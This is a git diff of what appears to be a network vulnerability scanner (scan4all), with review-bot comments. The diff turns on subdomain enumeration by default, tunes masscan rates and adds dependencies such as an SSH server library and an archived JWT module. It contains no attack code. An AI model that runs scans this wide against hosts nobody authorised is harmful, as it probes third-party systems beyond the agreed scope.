diff --git a/config/config.json b/config/config.json index b324509ad..6326b4b7c 100644 --- a/config/config.json +++ b/config/config.json @@ -66,13 +66,13 @@ "HydraUser": "", "HydraPass": "", "UrlPrecise": true, - "ParseSSl": false, - "EnableSubfinder": false, + "ParseSSl": true, + "EnableSubfinder": true, "EnableHoneyportDetection": true, - "EnableKsubdomain": false, + "EnableKsubdomain": true, "KsubdomainRegxp": "([0-9a-zA-Z\\-]+\\.[0-9a-zA-Z\\-]+)$", "naabu_dns": {}, - "naabu": {"TopPorts": "1000","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false}, + "naabu": {"TopPorts": "http","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false}, "priorityNmap": true, "noScan": false, "enableMultNuclei": false, diff --git a/config/doNmapScan.sh b/config/doNmapScan.sh index 29ed9234c..8f1ce93cf 100755 --- a/config/doNmapScan.sh +++ b/config/doNmapScan.sh @@ -1,5 +1,5 @@ #!/bin/bash -XRate=5000 +XRate=2000 function doMasScan { if [[ -f $1 ]] ; then # -F --top-ports=65535 diff --git a/config/scan4all_db.db b/config/scan4all_db.db index 65193fa2c..08d53340b 100644 Binary files a/config/scan4all_db.db and b/config/scan4all_db.db differ diff --git a/go.mod b/go.mod index b35bc4253..6fde24301 100644 --- a/go.mod +++ b/go.mod @@ -100,8 +100,8 @@ require ( github.com/google/go-github v17.0.0+incompatible github.com/gorilla/websocket v1.5.0 github.com/gosnmp/gosnmp v1.35.0 - github.com/hktalent/PipelineHttp v0.0.0-20221007051907-72402204b668 - github.com/hktalent/goSqlite_gorm v1.1.3 + github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66 + github.com/hktalent/goSqlite_gorm v1.1.4 github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267 github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358 github.com/icodeface/tls v0.0.0-20190904083142-17aec93c60e5 
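Review bot: The committed defaults in the config.json hunk now switch on `EnableSubfinder` and `EnableKsubdomain`, so a run against a single listed host also enumerates and probes sibling subdomains the operator never named. For a scanner that is a scope decision and is safer left opt-in; I would keep both at `false` in the shipped file and document how to enable them. `"TopPorts": "http"` replaces a numeric value, and the accepted values for that field are not visible in this diff, so please confirm the naabu wrapper maps `http` to a port list rather than silently falling back to a default.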
@@ -154,8 +154,10 @@ require ( github.com/alecthomas/jsonschema v0.0.0-20220216202328-9eeeec9d044b // indirect github.com/alecthomas/template v0.0.0-20190718012654-fb15b899a751 // indirect github.com/alecthomas/units v0.0.0-20211218093645-b94a6e3cc137 // indirect + github.com/andybalholm/brotli v1.0.4 // indirect github.com/andybalholm/cascadia v1.3.1 // indirect github.com/andygrunwald/go-jira v1.16.0 // indirect + github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be // indirect github.com/antchfx/xpath v1.2.1 // indirect github.com/antlr/antlr4/runtime/Go/antlr v1.4.10 // indirect github.com/aws/aws-sdk-go v1.44.113 // indirect 
@@ -172,19 +174,26 @@ require ( github.com/cockroachdb/redact v1.1.3 // indirect github.com/coreos/etcd v3.3.10+incompatible // indirect github.com/cpuguy83/go-md2man/v2 v2.0.2 // indirect + github.com/creack/pty v1.1.18 // indirect github.com/deckarep/golang-set v1.8.0 // indirect github.com/dgraph-io/ristretto v0.1.0 // indirect + github.com/dgrijalva/jwt-go v3.2.0+incompatible // indirect github.com/dimchansky/utfbom v1.1.1 // indirect github.com/docker/go-units v0.5.0 // indirect github.com/dsnet/compress v0.0.1 // indirect + github.com/dustin/go-broadcast v0.0.0-20211018055107-71439988bd91 // indirect github.com/dustin/go-humanize v1.0.0 // indirect + github.com/elastic/go-elasticsearch/v7 v7.17.1 // indirect github.com/emersion/go-textwrapper v0.0.0-20200911093747-65d896831594 // indirect github.com/fatih/structs v1.1.0 // indirect github.com/fortytw2/leaktest v1.3.0 // indirect github.com/fsnotify/fsnotify v1.5.4 // indirect github.com/getsentry/sentry-go v0.13.0 // indirect + github.com/gin-contrib/gzip v0.0.5 // indirect github.com/gin-contrib/sse v0.1.0 // indirect + github.com/gin-contrib/static v0.0.1 // indirect github.com/gin-gonic/gin v1.8.1 // indirect + github.com/gliderlabs/ssh v0.3.4 // indirect github.com/go-ole/go-ole v1.2.6 // indirect github.com/go-playground/locales v0.14.0 // indirect github.com/go-playground/universal-translator v0.18.0 // indirect @@ -222,6 +231,7 @@ require ( github.com/hashicorp/hcl v1.0.0 // indirect github.com/hdm/jarm-go v0.0.7 // indirect github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d // indirect + github.com/hktalent/go4Hacker v0.0.0-20220610050413-bb38dc39c4b9 // indirect github.com/hktalent/websocket v0.0.0-20220908204337-b4a81b861976 // indirect github.com/iancoleman/orderedmap v0.2.0 // indirect github.com/itchyny/gojq v0.12.9 // indirect 
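Review bot: The `@@ -172` require block gains `github.com/dgrijalva/jwt-go v3.2.0+incompatible`, an archived module whose maintained successor is `github.com/golang-jwt/jwt`, alongside `github.com/gliderlabs/ssh` and `github.com/creack/pty` (and `github.com/robfig/cron` in a later hunk). All are marked `// indirect`, so they presumably arrive through the `goSqlite_gorm` v1.1.4 bump or the new `go4Hacker` requirement; `go mod why -m <module>` would show which. An SSH server library, a pty allocator and a scheduler are a lot of new attack surface for a scanner binary, so it is worth confirming they are actually needed before the bump is merged.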
@@ -249,6 +259,7 @@ require ( github.com/mackerelio/go-osstat v0.2.3 // indirect github.com/magiconair/properties v1.8.6 // indirect github.com/mailru/easyjson v0.7.7 // indirect + github.com/manucorporat/stats v0.0.0-20180402194714-3ba42d56d227 // indirect github.com/marten-seemann/qpack v0.2.1 // indirect github.com/marten-seemann/qtls-go1-18 v0.1.2 // indirect github.com/marten-seemann/qtls-go1-19 v0.1.0 // indirect @@ -278,6 +289,7 @@ require ( github.com/projectdiscovery/tlsx v0.0.8 // indirect github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6 // indirect github.com/rivo/uniseg v0.4.2 // indirect + github.com/robfig/cron v1.2.0 // indirect github.com/rogpeppe/go-internal v1.9.0 // indirect github.com/russross/blackfriday/v2 v2.1.0 // indirect github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca // indirect @@ -300,6 +312,7 @@ require ( github.com/ugorji/go/codec v1.2.7 // indirect github.com/ulikunitz/xz v0.5.10 // indirect github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6 // indirect + github.com/unrolled/secure v1.10.0 // indirect github.com/valyala/bytebufferpool v1.0.0 // indirect github.com/valyala/fasttemplate v1.2.1 // indirect github.com/weppos/publicsuffix-go v0.20.0 // indirect diff --git a/go.sum b/go.sum index 252e1109a..1eee002e3 100644 --- a/go.sum +++ b/go.sum 
@@ -102,6 +102,8 @@ github.com/ammario/ipisp/v2 v2.0.0 h1:/aRMp5srZViiBfOUGzl/Esqae4s0MDDzm9buhGcZ0X github.com/ammario/ipisp/v2 v2.0.0/go.mod h1:bQ6KAL5LnYYEj6olUn+Bzv/im/4Esa5oGkbv9b+uOjo= github.com/andres-erbsen/clock v0.0.0-20160526145045-9e14626cd129 h1:MzBOUgng9orim59UnfUTLRjMpd09C5uEVQ6RPGeCaVI= github.com/andres-erbsen/clock v0.0.0-20160526145045-9e14626cd129/go.mod h1:rFgpPQZYZ8vdbc+48xibu8ALc3yeyd64IhHS+PU6Yyg= +github.com/andybalholm/brotli v1.0.4 h1:V7DdXeJtZscaqfNuAdSRuRFzuiKlHSC/Zh3zl9qY3JY= +github.com/andybalholm/brotli v1.0.4/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= github.com/andybalholm/cascadia v1.1.0/go.mod h1:GsXiBklL0woXo1j/WYWtSYYC4ouU9PqHO0sqidkEA4Y= github.com/andybalholm/cascadia v1.3.1 h1:nhxRkql1kdYCc8Snf7D5/D3spOX+dBgjA6u8x004T2c= github.com/andybalholm/cascadia v1.3.1/go.mod h1:R4bJ1UQfqADjvDa4P6HZHLh/3OxWWEqc0Sk8XGwHqvA= @@ -109,6 +111,8 @@ github.com/andygrunwald/go-jira v1.14.0/go.mod h1:KMo2f4DgMZA1C9FdImuLc04x4WQhn5 github.com/andygrunwald/go-jira v1.15.1/go.mod h1:GIYN1sHOIsENWUZ7B4pDeT/nxEtrZpE8l0987O67ZR8= github.com/andygrunwald/go-jira v1.16.0 h1:PU7C7Fkk5L96JvPc6vDVIrd99vdPnYudHu4ju2c2ikQ= github.com/andygrunwald/go-jira v1.16.0/go.mod h1:UQH4IBVxIYWbgagc0LF/k9FRs9xjIiQ8hIcC6HfLwFU= +github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be h1:9AeTilPcZAjCFIImctFaOjnTIavg87rW78vTPkQqLI8= +github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be/go.mod h1:ySMOLuWl6zY27l47sB3qLNK6tF2fkHG55UZxx8oIVo4= github.com/antchfx/htmlquery v1.2.3/go.mod h1:B0ABL+F5irhhMWg54ymEZinzMSi0Kt3I2if0BLYa3V0= github.com/antchfx/htmlquery v1.2.5 h1:1lXnx46/1wtv1E/kzmH8vrfMuUKYgkdDBA9pIdMJnk4= github.com/antchfx/htmlquery v1.2.5/go.mod h1:2MCVBzYVafPBmKbrmwB9F5xdd+IEgRY61ci2oOsOQVw= 
@@ -219,6 +223,8 @@ github.com/cpuguy83/go-md2man/v2 v2.0.0/go.mod h1:maD7wRr/U5Z6m/iR4s+kqSMx2CaBsr github.com/cpuguy83/go-md2man/v2 v2.0.2 h1:p1EgwI/C7NhT0JmVkwCD2ZBK8j4aeHQX2pMHHBfMQ6w= github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E= +github.com/creack/pty v1.1.18 h1:n56/Zwd5o6whRC5PMGretI4IdRLlmBXYNjScPaBgsbY= +github.com/creack/pty v1.1.18/go.mod h1:MOBLtS5ELjhRRrroQr9kyvTxUAFNvYEK993ew/Vr4O4= github.com/dave/dst v0.26.2/go.mod h1:UMDJuIRPfyUCC78eFuB+SV/WI8oDeyFDvM/JR6NI3IU= github.com/dave/gopackages v0.0.0-20170318123100-46e7023ec56e/go.mod h1:i00+b/gKdIDIxuLDFob7ustLAVqhsZRk2qVZrArELGQ= github.com/dave/jennifer v1.2.0/go.mod h1:fIb+770HOpJ2fmN9EPPKOqm1vMGhB+TwXKMZhrIygKg= @@ -239,6 +245,7 @@ github.com/dgraph-io/ristretto v0.0.2/go.mod h1:KPxhHT9ZxKefz+PCeOGsrHpl1qZ7i70d github.com/dgraph-io/ristretto v0.0.3/go.mod h1:KPxhHT9ZxKefz+PCeOGsrHpl1qZ7i70dGTu2u+Ahh6E= github.com/dgraph-io/ristretto v0.1.0 h1:Jv3CGQHp9OjuMBSne1485aDpUkTKEcUqF+jm/LuerPI= github.com/dgraph-io/ristretto v0.1.0/go.mod h1:fux0lOrBhrVCJd3lcTHsIJhq1T2rokOu6v9Vcb3Q9ug= +github.com/dgrijalva/jwt-go v3.2.0+incompatible h1:7qlOGliEKZXTDg6OTjfoBKDXWrumCAMpl/TFQ4/5kLM= github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ= github.com/dgryski/go-farm v0.0.0-20190423205320-6a90982ecee2/go.mod h1:SqUrOPUnsFjfmXRMNPybcSiG0BgUW2AuFH8PAnS2iTw= github.com/dgryski/go-farm v0.0.0-20200201041132-a6ae2369ad13 h1:fAjc9m62+UWV/WAFKLNi6ZS0675eEUC9y3AlwSbQu1Y= 
@@ -254,10 +261,14 @@ github.com/docker/go-units v0.5.0/go.mod h1:fgPhTUdO+D/Jk86RDLlptpiXQzgHJF7gydDD github.com/dsnet/compress v0.0.1 h1:PlZu0n3Tuv04TzpfPbrnI0HW/YwodEXDS+oPKahKF0Q= github.com/dsnet/compress v0.0.1/go.mod h1:Aw8dCMJ7RioblQeTqt88akK31OvO8Dhf5JflhBbQEHo= github.com/dsnet/golib v0.0.0-20171103203638-1ea166775780/go.mod h1:Lj+Z9rebOhdfkVLjJ8T6VcRQv3SXugXy999NBtR9aFY= +github.com/dustin/go-broadcast v0.0.0-20211018055107-71439988bd91 h1:jAUM3D1KIrJmwx60DKB+a/qqM69yHnu6otDGVa2t0vs= +github.com/dustin/go-broadcast v0.0.0-20211018055107-71439988bd91/go.mod h1:8rK6Kbo1Jd6sK22b24aPVgAm3jlNy1q1ft+lBALdIqA= github.com/dustin/go-humanize v1.0.0 h1:VSnTsYCnlFHaM2/igO1h6X3HA71jcobQuxemgkq4zYo= github.com/dustin/go-humanize v1.0.0/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk= github.com/eggsampler/acme/v3 v3.2.1/go.mod h1:/qh0rKC/Dh7Jj+p4So7DbWmFNzC4dpcpK53r226Fhuo= github.com/eknkc/amber v0.0.0-20171010120322-cdade1c07385/go.mod h1:0vRUJqYpeSZifjYj7uP3BG/gKcuzL9xWVV/Y+cK33KM= +github.com/elastic/go-elasticsearch/v7 v7.17.1 h1:49mHcHx7lpCL8cW1aioEwSEVKQF3s+Igi4Ye/QTWwmk= +github.com/elastic/go-elasticsearch/v7 v7.17.1/go.mod h1:OJ4wdbtDNk5g503kvlHLyErCgQwwzmDtaFC4XyOxXA4= github.com/emersion/go-message v0.16.0 h1:uZLz8ClLv3V5fSFF/fFdW9jXjrZkXIpE1Fn8fKx7pO4= github.com/emersion/go-message v0.16.0/go.mod h1:pDJDgf/xeUIF+eicT6B/hPX/ZbEorKkUMPOxrPVG2eQ= github.com/emersion/go-textwrapper v0.0.0-20200911093747-65d896831594 h1:IbFBtwoTQyw0fIM5xv1HF+Y+3ZijDR839WMulgxCcUY= 
@@ -290,12 +301,20 @@ github.com/getsentry/sentry-go v0.12.0/go.mod h1:NSap0JBYWzHND8oMbyi0+XZhUalc1TB github.com/getsentry/sentry-go v0.13.0 h1:20dgTiUSfxRB/EhMPtxcL9ZEbM1ZdR+W/7f7NWD+xWo= github.com/getsentry/sentry-go v0.13.0/go.mod h1:EOsfu5ZdvKPfeHYV6pTVQnsjfp30+XA7//UooKNumH0= github.com/ghemawat/stream v0.0.0-20171120220530-696b145b53b9/go.mod h1:106OIgooyS7OzLDOpUGgm9fA3bQENb/cFSyyBmMoJDs= +github.com/gin-contrib/gzip v0.0.5 h1:mhnVU32YnnBh2LPH2iqRqsA/eR7SAqRaD388jL2s/j0= +github.com/gin-contrib/gzip v0.0.5/go.mod h1:OPIK6HR0Um2vNmBUTlayD7qle4yVVRZT0PyhdUigrKk= github.com/gin-contrib/sse v0.0.0-20190301062529-5545eab6dad3/go.mod h1:VJ0WA2NBN22VlZ2dKZQPAPnyWw5XTlK1KymzLKsr59s= github.com/gin-contrib/sse v0.1.0 h1:Y/yl/+YNO8GZSjAhjMsSuLt29uWRFHdHYUb5lYOV9qE= github.com/gin-contrib/sse v0.1.0/go.mod h1:RHrZQHXnP2xjPF+u1gW/2HnVO7nvIa9PG3Gm+fLHvGI= +github.com/gin-contrib/static v0.0.1 h1:JVxuvHPuUfkoul12N7dtQw7KRn/pSMq7Ue1Va9Swm1U= +github.com/gin-contrib/static v0.0.1/go.mod h1:CSxeF+wep05e0kCOsqWdAWbSszmc31zTIbD8TvWl7Hs= github.com/gin-gonic/gin v1.4.0/go.mod h1:OW2EZn3DO8Ln9oIKOvM++LBO+5UPHJJDH72/q/3rZdM= +github.com/gin-gonic/gin v1.6.3/go.mod h1:75u5sXoLsGZoRN5Sgbi1eraJ4GU3++wFwWzhwvtwp4M= +github.com/gin-gonic/gin v1.7.4/go.mod h1:jD2toBW3GZUr5UMcdrwQA10I7RuaFOl/SGeDjXkfUtY= github.com/gin-gonic/gin v1.8.1 h1:4+fr/el88TOO3ewCmQr8cx/CtZ/umlIRIs5M4NTNjf8= github.com/gin-gonic/gin v1.8.1/go.mod h1:ji8BvRH1azfM+SYow9zQ6SZMvR8qOMZHmsCuWR9tTTk= +github.com/gliderlabs/ssh v0.3.4 h1:+AXBtim7MTKaLVPgvE+3mhewYRawNLTd+jEEz/wExZw= +github.com/gliderlabs/ssh v0.3.4/go.mod h1:ZSS+CUoKHDrqVakTfTWUlKSr9MtMFkC4UvtQKD7O914= github.com/go-check/check v0.0.0-20180628173108-788fd7840127/go.mod h1:9ES+weclKsC9YodN5RgxqK/VD9HM9JsCSh7rNhMZE98= github.com/go-errors/errors v1.0.1 h1:LUHzmkK3GUKUrL/1gfBUxAHzcev3apQlezX/+O7ma6w= github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q= 
@@ -309,10 +328,14 @@ github.com/go-ole/go-ole v1.2.6 h1:/Fpf6oFPoeFik9ty7siob0G6Ke8QvQEuVcuChpwXzpY= github.com/go-ole/go-ole v1.2.6/go.mod h1:pprOEPIfldk/42T2oK7lQ4v4JSDwmV0As9GaiUsvbm0= github.com/go-playground/assert/v2 v2.0.1 h1:MsBgLAaY856+nPRTKrp3/OZK38U/wa0CcBYNjji3q3A= github.com/go-playground/assert/v2 v2.0.1/go.mod h1:VDjEfimB/XKnb+ZQfWdccd7VUvScMdVu0Titje2rxJ4= +github.com/go-playground/locales v0.13.0/go.mod h1:taPMhCMXrRLJO55olJkUXHZBHCxTMfnGwq/HNwmWNS8= github.com/go-playground/locales v0.14.0 h1:u50s323jtVGugKlcYeyzC0etD1HifMjqmJqb8WugfUU= github.com/go-playground/locales v0.14.0/go.mod h1:sawfccIbzZTqEDETgFXqTho0QybSa7l++s0DH+LDiLs= +github.com/go-playground/universal-translator v0.17.0/go.mod h1:UkSxE5sNxxRwHyU+Scu5vgOQjsIJAF8j9muTVoKLVtA= github.com/go-playground/universal-translator v0.18.0 h1:82dyy6p4OuJq4/CByFNOn/jYrnRPArHwAcmLoJZxyho= github.com/go-playground/universal-translator v0.18.0/go.mod h1:UvRDBj+xPUEGrFYl+lu/H90nyDXpg0fqeB/AQUGNTVA= +github.com/go-playground/validator/v10 v10.2.0/go.mod h1:uOYAAleCW8F/7oMFd6aG0GOhaH6EGOAJShg8Id5JGkI= +github.com/go-playground/validator/v10 v10.4.1/go.mod h1:nlOn6nFhuKACm19sB/8EGNn9GlaMV7XkbRSipzJ0Ii4= github.com/go-playground/validator/v10 v10.11.0/go.mod h1:i+3WkQ1FvaUjjxh1kSvIA4dMGDBiPU55YFDl0WbKdWU= github.com/go-playground/validator/v10 v10.11.1 h1:prmOlTVv+YjZjmRmNSF3VmspqJIxJWXmqUsHwfTRRkQ= github.com/go-playground/validator/v10 v10.11.1/go.mod h1:i+3WkQ1FvaUjjxh1kSvIA4dMGDBiPU55YFDl0WbKdWU= 
@@ -516,10 +539,16 @@ github.com/hdm/jarm-go v0.0.7 h1:Eq0geenHrBSYuKrdVhrBdMMzOmA+CAMLzN2WrF3eL6A= github.com/hdm/jarm-go v0.0.7/go.mod h1:kinGoS0+Sdn1Rr54OtanET5E5n7AlD6T6CrJAKDjJSQ= github.com/hktalent/PipelineHttp v0.0.0-20221007051907-72402204b668 h1:10csPasxwFPuL0dV/8Wut1SVmBmEiY4VB77QOFW50KE= github.com/hktalent/PipelineHttp v0.0.0-20221007051907-72402204b668/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg= +github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66 h1:D/PD14cl6K/udXTn1IQ25obI6bjRr+fmxeVnHOQGYlg= +github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg= github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d h1:z1IUP4hqn0LGgs78bU2gSlna92/p+RlB0MSZ+RxSmCo= github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d/go.mod h1:Du0lF0ZtTONXpWydjmnsL71He+zlimYLmTmAZta19ZA= +github.com/hktalent/go4Hacker v0.0.0-20220610050413-bb38dc39c4b9 h1:OAnRWLddVE6FPOeIHJcgDYWoQWpvh/F5w/1MEJikWIQ= +github.com/hktalent/go4Hacker v0.0.0-20220610050413-bb38dc39c4b9/go.mod h1:Mp15ofPLpEzvJUl8BR7ctBhp0lf2xL5Nr76xwlTfj9M= github.com/hktalent/goSqlite_gorm v1.1.3 h1:PZNdM8/w4thzlpOhpFW4Qqytaf/0RF19aiTyA3H1HG0= github.com/hktalent/goSqlite_gorm v1.1.3/go.mod h1:GnAPG+EfWVn/pI2mVz+r43cE/l6Suu647I5Hvo/kGmc= +github.com/hktalent/goSqlite_gorm v1.1.4 h1:36uSmVMqIGacIdqZpGWBXgovdnlloWRFl0DdnRVtxok= +github.com/hktalent/goSqlite_gorm v1.1.4/go.mod h1:qpfsbYRX1f6JSTlxG7WLuoLLzmfVjhAHdBxo2g0/oAs= github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267 h1:eH9QDUO5zwn34BLweSdpTdNcxHD/GXxxLDEG7gaR4OQ= github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267/go.mod h1:4r72GiZnJx4nyoKOHbzu0/5NCuY01Yekue5zueaYUcs= github.com/hktalent/websocket v0.0.0-20220908204337-b4a81b861976 h1:oGE7u0adRuzpamtAkkOy65hevwyEtrszTAVz+USJz/k= 
@@ -657,6 +686,7 @@ github.com/labstack/gommon v0.3.0/go.mod h1:MULnywXg0yavhxWKc+lOruYdAhDwPK9wf0OL github.com/lcvvvv/gonmap v1.2.1 h1:Itbo0mnH45X9HBdzjn92e0ZTaBbBdfyfxWY21uGUAw8= github.com/lcvvvv/gonmap v1.2.1/go.mod h1:USOReUnvvGX9/3h8arU3c6ViJ0dCilM+bTwJWQI4e0A= github.com/ledongthuc/pdf v0.0.0-20220302134840-0c2507a12d80 h1:6Yzfa6GP0rIo/kULo2bwGEkFvCePZ3qHDDTC3/J9Swo= +github.com/leodido/go-urn v1.2.0/go.mod h1:+8+nEpDfqqsY+g338gtMEUOtuK+4dEMhiQEgxpxOKII= github.com/leodido/go-urn v1.2.1 h1:BqpAaACuzVSgi/VLzGZIobT2z4v53pjosyNd9Yv6n/w= github.com/leodido/go-urn v1.2.1/go.mod h1:zt4jvISO2HfUBqxjfIshjdMTYS56ZS/qv49ictyFfxY= github.com/lib/pq v1.10.7 h1:p7ZhMD+KsSRozJr34udlUrhboJwWAgCg34+/ZZNvZZw= @@ -682,6 +712,8 @@ github.com/magiconair/properties v1.8.6 h1:5ibWZ6iY0NctNGWo87LalDlEZ6R41TqbbDamh github.com/magiconair/properties v1.8.6/go.mod h1:y3VJvCyxH9uVvJTWEGAELF3aiYNyPKd5NZ3oSwXrF60= github.com/mailru/easyjson v0.7.7 h1:UGYAvKxe3sBsEDzO8ZeWOSlIQfWFlxbzLZe7hwFURr0= github.com/mailru/easyjson v0.7.7/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc= +github.com/manucorporat/stats v0.0.0-20180402194714-3ba42d56d227 h1:KIaAZ/V+/0/6BOULrmBQ9T1ed8BkKqGIjIKW923nJuo= +github.com/manucorporat/stats v0.0.0-20180402194714-3ba42d56d227/go.mod h1:ruMr5t05gVho4tuDv0PbI0Bb8nOxc/5Y6JzRHe/yfA0= github.com/marten-seemann/qpack v0.2.1 h1:jvTsT/HpCn2UZJdP+UUB53FfUUgeOyG5K1ns0OJOGVs= github.com/marten-seemann/qpack v0.2.1/go.mod h1:F7Gl5L1jIgN1D11ucXefiuJS9UMVP2opoCp2jDKb7wc= github.com/marten-seemann/qtls-go1-18 v0.1.2 h1:JH6jmzbduz0ITVQ7ShevK10Av5+jBEKAHMntXmIV7kM= 
@@ -970,6 +1002,8 @@ github.com/remeh/sizedwaitgroup v1.0.0/go.mod h1:3j2R4OIe/SeS6YDhICBy22RWjJC5eNC github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rivo/uniseg v0.4.2 h1:YwD0ulJSJytLpiaWua0sBDusfsCZohxjxzVTYjwxfV8= github.com/rivo/uniseg v0.4.2/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= +github.com/robfig/cron v1.2.0 h1:ZjScXvvxeQ63Dbyxy76Fj3AT3Ut0aKsyd2/tl3DTMuQ= +github.com/robfig/cron v1.2.0/go.mod h1:JGuDeoQd7Z6yL4zQhZ3OPEVHB7fL6Ka6skscFHfmt2k= github.com/rogpeppe/fastuuid v1.1.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= github.com/rogpeppe/go-internal v1.6.1/go.mod h1:xXDCJY+GAPziupqXw64V24skbSoqbTEfhy4qGm1nDQc= @@ -1110,6 +1144,8 @@ github.com/ulikunitz/xz v0.5.10 h1:t92gobL9l3HE202wg3rlk19F6X+JOxl9BBrCCMYEYd8= github.com/ulikunitz/xz v0.5.10/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6 h1:TtyC78WMafNW8QFfv3TeP3yWNDG+uxNkk9vOrnDu6JA= github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6/go.mod h1:h8272+G2omSmi30fBXiZDMkmHuOgonplfKIKjQWzlfs= +github.com/unrolled/secure v1.10.0 h1:TBNP42z2AB+2pW9PR6vdbqhlQuv1iTeSVzK1qHjOBzA= +github.com/unrolled/secure v1.10.0/go.mod h1:BmF5hyM6tXczk3MpQkFf1hpKSRqCyhqcbiQtiAF7+40= github.com/urfave/cli/v2 v2.0.0/go.mod h1:SE9GqnLQmjVa0iPEY0f1w3ygNIYcIJ0OKPMoW2caLfQ= github.com/urfave/cli/v2 v2.16.3 h1:gHoFIwpPjoyIMbJp/VFd+/vuD0dAgFK4B6DpEMFJfQk= github.com/urfave/cli/v2 v2.16.3/go.mod h1:1CNUng3PtjQMtRzJO4FMXBQvkGtuYRxxiR9xMa7jMwI= 
@@ -1254,6 +1290,7 @@ golang.org/x/crypto v0.0.0-20201112155050-0c6587e931a9/go.mod h1:LzIPMQfyMNhhGPh golang.org/x/crypto v0.0.0-20201124201722-c8d3bf9c5392/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I= golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4= golang.org/x/crypto v0.0.0-20210421170649-83a5a9bb288b/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4= +golang.org/x/crypto v0.0.0-20210616213533-5ff15b29337e/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20211108221036-ceb1ce70b4fa/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20211215153901-e495a2d5b3d3/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= @@ -1462,6 +1499,7 @@ golang.org/x/sys v0.0.0-20210426230700-d19ff857e887/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210601080250-7ecdf8ef093b/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210616094352-59db8d763f22/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210806184541-e5e7981a1069/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210823070655-63515b42dcdf/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= diff --git a/lib/util/config.go b/lib/util/config.go index 5780c62d4..432c8e5b2 100644 --- a/lib/util/config.go +++ b/lib/util/config.go 
